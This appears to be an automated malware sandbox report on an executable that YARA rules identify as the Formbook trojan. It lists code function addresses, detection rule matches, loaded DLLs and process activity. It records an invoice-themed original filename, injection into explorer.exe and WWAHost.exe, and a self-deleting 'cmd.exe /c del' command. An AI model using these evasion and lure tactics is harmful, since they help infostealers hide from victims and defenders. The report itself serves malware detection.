Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530CB5 4_2_01530CB5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504F40 4_2_01504F40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01532F30 4_2_01532F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D2F28 4_2_014D2F28
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0F30 4_2_014B0F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482FC8 4_2_01482FC8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149CFE0 4_2_0149CFE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150EFA0 4_2_0150EFA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490E59 4_2_01490E59
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154EE26 4_2_0154EE26
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154EEDB 4_2_0154EEDB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154CE93 4_2_0154CE93
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2E90 4_2_014A2E90
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C516C 4_2_014C516C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147F172 4_2_0147F172
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155B16B 4_2_0155B16B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149B1B0 4_2_0149B1B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014970C0 4_2_014970C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153F0CC 4_2_0153F0CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F0E0 4_2_0154F0E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015470E9 4_2_015470E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147D34C 4_2_0147D34C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154132D 4_2_0154132D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D739A 4_2_014D739A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AB2C0 4_2_014AB2C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015312ED 4_2_015312ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014952A0 4_2_014952A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547571 4_2_01547571
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015595C3 4_2_015595C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152D5B0 4_2_0152D5B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01481460 4_2_01481460
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F43F 4_2_0154F43F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154F7B0 4_2_0154F7B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D5630 4_2_014D5630
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015416CC 4_2_015416CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01499950 4_2_01499950
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AB950 4_2_014AB950
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01525910 4_2_01525910
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FD800 4_2_014FD800
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014938E0 4_2_014938E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FB76 4_2_0154FB76
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01505BF0 4_2_01505BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014CDBF9 4_2_014CDBF9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AFB80 4_2_014AFB80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547A46 4_2_01547A46
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FA49 4_2_0154FA49
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01503A6C 4_2_01503A6C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153DAC6 4_2_0153DAC6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D5AA0 4_2_014D5AA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01531AA3 4_2_01531AA3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152DAAC 4_2_0152DAAC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01493D40 4_2_01493D40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01541D5A 4_2_01541D5A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547D73 4_2_01547D73
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AFDC0 4_2_014AFDC0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01509C32 4_2_01509C32
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FCF2 4_2_0154FCF2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FF09 4_2_0154FF09
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01453FD5 4_2_01453FD5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01453FD2 4_2_01453FD2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01491F92 4_2_01491F92
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FFB1 4_2_0154FFB1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01499EB0 4_2_01499EB0
Source: C:\Windows\explorer.exe Code function: 7_2_09258232 7_2_09258232
Source: C:\Windows\explorer.exe Code function: 7_2_09252B30 7_2_09252B30
Source: C:\Windows\explorer.exe Code function: 7_2_09252B32 7_2_09252B32
Source: C:\Windows\explorer.exe Code function: 7_2_0924FD02 7_2_0924FD02
Source: C:\Windows\explorer.exe Code function: 7_2_09255912 7_2_09255912
Source: C:\Windows\explorer.exe Code function: 7_2_0925B5CD 7_2_0925B5CD
Source: C:\Windows\explorer.exe Code function: 7_2_09257036 7_2_09257036
Source: C:\Windows\explorer.exe Code function: 7_2_0924E082 7_2_0924E082
Source: C:\Windows\explorer.exe Code function: 7_2_106E0036 7_2_106E0036
Source: C:\Windows\explorer.exe Code function: 7_2_106D7082 7_2_106D7082
Source: C:\Windows\explorer.exe Code function: 7_2_106D8D02 7_2_106D8D02
Source: C:\Windows\explorer.exe Code function: 7_2_106DE912 7_2_106DE912
Source: C:\Windows\explorer.exe Code function: 7_2_106E45CD 7_2_106E45CD
Source: C:\Windows\explorer.exe Code function: 7_2_106E1232 7_2_106E1232
Source: C:\Windows\explorer.exe Code function: 7_2_106DBB30 7_2_106DBB30
Source: C:\Windows\explorer.exe Code function: 7_2_106DBB32 7_2_106DBB32
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00160090 9_2_00160090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126BA3 9_2_00126BA3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126BA8 9_2_00126BA8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00164CE0 9_2_00164CE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00170EF0 9_2_00170EF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127036 9_2_00127036
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00171337 9_2_00171337
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04134420 9_2_04134420
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04142446 9_2_04142446
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0413E4F6 9_2_0413E4F6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090535 9_2_04090535
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04150591 9_2_04150591
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040AC6E0 9_2_040AC6E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040B4750 9_2_040B4750
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090770 9_2_04090770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0408C7C0 9_2_0408C7C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04122000 9_2_04122000
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04080100 9_2_04080100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0412A118 9_2_0412A118
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04118158 9_2_04118158
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041441A2 9_2_041441A2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041501AA 9_2_041501AA
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014D7E54 appears 111 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 0150F290 appears 105 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014C5130 appears 58 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014FEA12 appears 86 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 0147B970 appears 280 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 040FEA12 appears 49 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0017318B appears 128 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0410F290 appears 80 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00192F80 appears 922 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 040D7E54 appears 50 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00194C81 appears 35 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0016E951 appears 387 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0407B970 appears 75 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00194FF1 appears 138 times
Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000000.2038477421.0000000000CC6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2494382664.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2509254740.00000000074B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRP8SH.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003150000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: yaM8XR1HfL.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/1@2/1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001BED2C memset,memset,EnterCriticalSection,FormatMessageW,GetLastError,FormatMessageW,GetLastError,GetCurrentThreadId,LocalFree, 9_2_001BED2C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yaM8XR1HfL.exe.log
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: yaM8XR1HfL.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: yaM8XR1HfL.exe ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: wldp.dll
